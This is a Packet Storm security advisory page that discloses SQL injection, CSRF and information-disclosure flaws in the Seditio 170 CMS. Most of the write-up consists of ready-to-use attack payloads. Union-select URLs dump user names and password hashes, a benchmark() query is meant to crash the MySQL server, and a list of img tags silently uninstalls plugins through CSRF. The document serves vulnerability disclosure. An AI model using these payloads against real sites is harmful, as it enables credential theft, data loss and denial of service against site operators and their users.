what you don't know can hurt you

Seditio 170 Cross Site Request Forgery / SQL Injection

Seditio 170 Cross Site Request Forgery / SQL Injection
Posted Apr 12, 2012
Authored by Akastep

Seditio version 170 suffers from cross site request forgery and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
MD5 | be042b5fe3b90a4be8b6026f48657ab0

Seditio 170 Cross Site Request Forgery / SQL Injection

Change Mirror Download
============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from:http://www.neocrome.net/files/code/seditio-build170.20120302.rar
(MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is Prone to SQL injection vulnerability.
Note:*For successfull exploitation requires administrative authentication to system.*


//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');

if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");


Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--


Overload MYSQL server:(As result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF especially if you have no any access to system as admin.
In eg:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />

Print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png




Seditio 170 (seditio-build170.20120302) also prone to CSRF (Cross Site Request Forgery)
vulnerability because it doesn't checks request validity throught $_GET request
and as result we can silently Uninstall/stop/pause/start plugins which may cause:
Data loss,functionality loss.
===========================================================================================
/*Tested with Seditio 165/seditio-build170.20120302 versions [Uninstall Plugins] CSRF exploit.*/
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
==============================================================================================



Information Disclosure:

Try to post in inputs very long string.

Application will expose column.names which is not acceptable anymore from security consideration.

In eg:
Client Side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP



Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1



Persistent Cross Site Scripting vulnerability still unfixed.(from Seditio 161)
Same Info/Path disclosures still unfixed.(from Seditio 161).
("Thanks" for TinyMCE editor and thanks to client side validation)(from Seditio 161)
I notified about it here+ to vendor too but it still unfixed in 170.20120302 too.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================


+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    21 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    19 Files
  • 24
    Jan 24th
    11 Files
  • 25
    Jan 25th
    1 Files
  • 26
    Jan 26th
    1 Files
  • 27
    Jan 27th
    19 Files
  • 28
    Jan 28th
    9 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close